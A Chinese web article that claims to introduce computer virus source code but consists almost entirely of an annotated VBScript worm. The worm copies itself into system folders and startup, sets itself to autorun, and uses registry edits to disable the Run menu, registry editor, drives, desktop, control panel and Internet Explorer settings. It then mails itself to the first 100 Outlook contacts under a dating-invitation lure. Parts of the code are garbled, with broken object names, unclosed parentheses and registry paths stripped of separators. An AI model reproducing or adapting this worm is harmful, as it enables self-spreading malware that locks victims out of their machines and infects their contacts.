电脑病毒源代码介绍

2017-03-22

电脑中了病毒想从它的源代码入手怎么办呢!有小编在,下面由小编给你做出详细的电脑病毒源代码介绍!希望对你有帮助!

电脑病毒源代码介绍:

电脑病毒源代码一:

on error resume next

set fs=createobject("ing.filesystemobject" '创建一个能与操作系统沟通的对象,再利用该对象的各种方法对注册表进行操作

set dir1=fs.getspecialfolder(0) '获取windows/winnt文件夹位置

set dir2=fs.getspecialfolder(1) '获取system32/system文件夹位置

set so=createobject("ing.filesystemobject"

dim r '定义一个变量

set r=createobject("w.shell"

so.getfile(w.fullname).copy(dir1&"win32system.vbs" '复制病毒副本到windows/winnt文件夹位置

so.getfile(w.fullname).copy(dir2&"win32system.vbs" '复制病毒副本到system32/system文件夹位置

so.getfile(w.fullname).copy(dir1&"start menuprograms启动win32system.vbs" '复制病毒副本到start menu启动菜单

'下面是对注册表的恶意修改和简单的依靠oe传播

r.regwrite "hkcusoftwaremicrosoftwindowscurrentversionpoliciesexplorernorun",1,"reg_dword" '修改注册表,禁止“运行”菜单

r.regwrite "kcusoftwaremicrosoftwindowscurrentversionpoliciesexplorernoclose",1,"reg_dword" '修改注册表,禁止“关闭”菜单

r.regwrite "hkcusoftwaremicrosoftwindowscurrentversionpoliciesexplorernodrives",63000000,"reg_dword" '修改注册表,隐藏所有逻辑盘符

r.regwrite "hkcusoftwaremicrosoftwindowscurrentversionpoliciessystemdisableregistrytools",1,"reg_dword" '修改注册表,禁止注册表编辑

r.regwrite "hklmsoftwaremicrosoftwindowscurrentversionrunscanregistry","" '修改注册表,禁止开机注册表扫描

r.regwrite "hkcusoftwaremicrosoftwindowscurrentversionpoliciesexplorernologoff",1,"reg_dword" '修改注册表,禁止“注销”菜单

r.regwrite "hkcusoftwaremicrosoftwindowscurrentversionpolicieswinoldappnorealmode",1,"reg_dword" '修改注册表,禁止ms-dos实模式

r.regwrite "hklmsoftwaremicrosoftwindowscurrentversionrunwin32system","win32system.vbs" '修改注册表,使这个脚本本身开机自动运行

r.regwrite "hkcusoftwaremicrosoftwindowscurrentversionpoliciesexplorernodesktop",1,"reg_dword" '修改注册表,禁止显示桌面图标

r.regwrite "hkcusoftwaremicrosoftwindowscurrentversionpolicieswinoldappdisabled",1,"reg_dword" '修改注册表,禁止纯dos模式

r.regwrite "hkcusoftwaremicrosoftwindowscurrentversionpoliciesexplorernosettaskbar",1,"reg_dword" '修改注册表,禁止“任务栏和开始”菜单

r.regwrite "hkcusoftwaremicrosoftwindowscurrentversionpoliciesexplorernoviewcontextmenu",1,"reg_dword" '修改注册表,禁止右键菜单

电脑病毒源代码二:

r.regwrite "hkcusoftwaremicrosoftwindowscurrentversionpoliciesexplorernosetfolders",1,"reg_dword" '修改注册表,禁止控制面板

r.regwrite "hklmsoftwareclasses.reg","txtfile" '修改注册表,禁止导入使用.reg文件,改为用txt文件的关联

r.regwrite "hklmsoftwaremicrosoftwindowscurrentversionwinlogonlegalnoticecaption","警告" '设置开机提示框标题

r.regwrite "hklmsoftwaremicrosoftwindowscurrentversionwinlogonlegalnoticetext","您中vbs脚本病毒了,哭吧~" '设置开机提示框文本内容

set ol=createobject("outlook.application" '创建outlook文件对象用于传播

on error resume next

for x=1 to 100

set mail=ol.createitem(0)

mail.to=ol.getnamespace("mapi".addresslists(1).addressentries(x) '用于向地址簿的前100名发送此 vbs病毒,可以算是简单弱智的蠕虫了吧~~

mail.subject="今晚你来吗?" '邮件主题

mail.body="朋友你好:您的朋友rose给您发来了热情的邀请。具体情况请阅读随信附件,祝您好运! 同城约会网" '邮件内容

mail.attachments.add(dir2&"win32system.vbs"

mail.send

next

ol.quit

'下面是对internet explore 选项的恶意修改

r.regwrite "hkcusoftwarepoliciesmicrosoftinternet explorerrestrictionsnobrowsercontextmenu",1,"reg_dword" '修改注册表,禁止鼠标右键

r.regwrite "hkcusoftwarepoliciesmicrosoftinternet explorerrestrictionsnobrowseroptions",1,"reg_dword" '修改注册表,禁止internet选项

r.regwrite "hkcusoftwarepoliciesmicrosoftinternet explorerrestrictionsnobrowsersaveas",1,"reg_dword" '修改注册表,禁止“另存为”

r.regwrite "hkcusoftwarepoliciesmicrosoftinternet explorerrestrictionsnofileopen",1,"reg_dword" '修改注册表,禁止“文件/打开”菜单

r.regwrite "hkcusoftwarepoliciesmicrosoftinternet explorercontrol paneladvanced",1,"reg_dword" '修改注册表,禁止更改高级页设置

r.regwrite "hkcusoftwarepoliciesmicrosoftinternet explorercontrol panelcache internet",1,"reg_dword" '修改注册表,禁止更改临时文件设置

r.regwrite "hkcusoftwarepoliciesmicrosoftinternet explorercontrol panelautoconfig",1,"reg_dword" '修改注册表,禁止更改自动配置

r.regwrite "hkcusoftwarepoliciesmicrosoftinternet explorercontrol panelhomepage",1,"reg_dword" '修改注册表,禁止更改主页,即“主页”变灰

r.regwrite "hkcusoftwarepoliciesmicrosoftinternet explorercontrol panelhistory",1,"reg_dword" '修改注册表,禁止更改历史记录设置

r.regwrite "hkcusoftwarepoliciesmicrosoftinternet explorercontrol panelconnwiz admin lock",1,"reg_dword" '修改注册表,禁止更改internet连接向导

r.regwrite "hkcusoftwarepoliciesmicrosoftinternet explorercontrol panelsecuritytab",1,"reg_dword" '修改注册表,禁止更改安全项

r.regwrite "hkcusoftwarepoliciesmicrosoftinternet explorercontrol panelresetwebsettings",1,"reg_dword" '修改注册表,禁止“重置web设置”

r.regwrite "hkcusoftwarepoliciesmicrosoftinternet explorerrestrictionsnoviewsource",1,"reg_dword" '修改注册表,禁止查看源文件

r.regwrite "hkcusoftwarepoliciesmicrosoftinternet explorerinfodeliveryrestrictionsnoaddingsubions",1,"reg_dword" '修改注册表,禁止添加脱机计划

r.regwrite "hkcusoftwaremicrosoftwindowscurrentversionpoliciesexplorernofilemenu",1,"reg_dword" '修改注册表,禁止“文件”菜单

更多相关阅读

最新发布的文章